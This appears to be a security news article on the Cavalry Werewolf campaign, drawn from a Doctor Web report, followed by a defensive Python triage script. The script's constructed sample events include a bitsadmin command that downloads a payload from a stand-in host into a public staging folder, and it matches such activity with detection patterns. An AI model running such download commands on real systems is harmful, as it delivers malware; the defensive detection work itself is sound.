Cavalry Werewolf Targets Government Networks, Deploys Backdoor for Access
A forensic investigation confirmed the organization had been targeted in a sophisticated cyberespionage campaign conducted by the hacker group known as Cavalry Werewolf.
The group used phishing attachments embedded with new and modified malware variants to infiltrate the government network and collect sensitive data, including internal documents and network configuration details.
The attackers used a spearphishing vector, sending emails containing malicious archives disguised as official documents.
The payload, BackDoor.ShellNET.1, based on the open-source Reverse-Shell-CS tool, established reverse-shell connections to remote servers that allowed the attackers to execute commands.
Once access was secured, the threat actors downloaded additional payloads using legitimate system tools, such as BITSADMIN, to escalate the intrusion and establish persistence.
The investigation uncovered a vast arsenal of tools used across the infection chain. In the initial stages, BAT.Downloader.1138 downloaded additional payloads through PowerShell, while Trojan.Packed2.49708 and Trojan.Siggen31.54011 deployed embedded backdoors such as BackDoor.Spy.4033 and BackDoor.Spy.4038.
These tools enabled remote command execution and reconnaissance inside the victim networks. Further post-exploitation involved BackDoor.Tunnel.41, based on the ReverseSocks5 open-source code, which establishes covert SOCKS5 tunnels for lateral movement.
Doctor Web also discovered advanced persistence mechanisms through BackDoor.Siggen2.5463, controlled via Telegram bots, and Trojan.Inject5.57968, which injected malicious payloads into legitimate processes like aspnet_compiler.exe.
Modified versions of popular utilities, including WinRAR, 7-Zip, and Visual Studio Code, were found to be trojanized (Trojan.Packed2.49862), embedding malware such as BackDoor.ReverseProxy.1, BackDoor.Havoc.16 and Trojan.Clipper.808.
Cavalry Werewolf heavily relies on external C2 communication and Telegram-controlled backdoors to maintain prolonged network access.
The group consistently uses directories such as C:\users\public\pictures, libraries, and downloads for staging payloads and persistence.
Collected commands observed during analysis included reconnaissance functions like ipconfig /all, net user, and whoami, as well as file enumeration and proxy configuration to assess system reachability.
Mapping the attack chain to the MITRE ATT&CK framework, Doctor Web attributed the following techniques: Spearphishing Attachment (T1566.001), PowerShell Execution (T1059.001), BITS Jobs for Persistence (T1197), and Exfiltration Over C2 Channel (T1041).
The continual use of open-source frameworks such as ReverseSocks5 and AdaptixC2 illustrates Cavalry Werewolf’s strategy of blending custom development with publicly available tooling, thereby increasing stealth and adaptability during operations.
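The staging directories, BITSADMIN downloads, reconnaissance commands and aspnet_compiler.exe injection described above translate directly into process-creation detections. The following triage script is an added illustration, not code from the Doctor Web report; the Sysmon-style events it runs over are constructed, and the host paths and the C2 hostname in them are invented.

```python
import re
from collections import defaultdict

# Constructed sample process-creation events (Sysmon Event ID 1 style),
# not taken from the report; paths and the download host are invented.
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd /c bitsadmin /transfer j /download http://c2.invalid/p.bin C:\users\public\pictures\p.exe"},
    {"pid": 101, "ppid": 1, "image": r"C:\users\public\pictures\p.exe", "cmdline": "p.exe"},
    {"pid": 102, "ppid": 101, "image": r"C:\Windows\System32\ipconfig.exe", "cmdline": "ipconfig /all"},
    {"pid": 103, "ppid": 101, "image": r"C:\Windows\System32\whoami.exe", "cmdline": "whoami"},
    {"pid": 104, "ppid": 101, "image": r"C:\Windows\System32\net.exe", "cmdline": "net user"},
    {"pid": 105, "ppid": 101, "cmdline": "aspnet_compiler.exe",
     "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe"},
    {"pid": 106, "ppid": 1, "image": r"C:\Program Files\7-Zip\7z.exe", "cmdline": "7z x report.zip"},
]

# Public staging directories named in the report, matched case-insensitively.
STAGING_DIRS = re.compile(r"c:\\users\\public\\(pictures|libraries|downloads)\\", re.I)
# BITSADMIN used to fetch a file (T1197) rather than merely queried.
BITS_DOWNLOAD = re.compile(r"\bbitsadmin\b.*(/transfer|/download|/addfile)", re.I)
# Reconnaissance commands the report lists; a burst of them from one parent is the signal.
RECON_CMDS = {"ipconfig /all", "whoami", "net user"}

def triage(events, recon_threshold=3):
    """Return (rule, pid) findings for the TTPs described in the report."""
    findings = []
    recon_by_parent = defaultdict(set)
    image_by_pid = {e["pid"]: e["image"] for e in events}
    for e in events:
        cmd, img = e["cmdline"], e["image"]
        if BITS_DOWNLOAD.search(cmd):
            findings.append(("T1197 bitsadmin download", e["pid"]))
        if STAGING_DIRS.search(img) or STAGING_DIRS.search(cmd):
            findings.append(("payload in public staging dir", e["pid"]))
        if cmd.strip().lower() in RECON_CMDS:
            recon_by_parent[e["ppid"]].add(cmd.strip().lower())
        # aspnet_compiler.exe is a plausible injection host only when a build tool starts it;
        # a parent living in a staging directory is the anomaly worth raising.
        if img.lower().endswith("aspnet_compiler.exe") and STAGING_DIRS.search(image_by_pid.get(e["ppid"], "")):
            findings.append(("aspnet_compiler.exe spawned from staging dir", e["pid"]))
    for ppid, cmds in recon_by_parent.items():
        if len(cmds) >= recon_threshold:
            findings.append(("recon burst from one parent", ppid))
    return findings

if __name__ == "__main__":
    for rule, pid in triage(SAMPLE_EVENTS):
        print(f"{rule}: pid {pid}")
```

The benign 7-Zip launch in the sample produces no finding, which is the point of keying on the download verb, the staging path and the parent relationship rather than on tool names alone.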
The post Cavalry Werewolf Targets Government Networks, Deploys Backdoor for Access appeared first on Cyber Security News.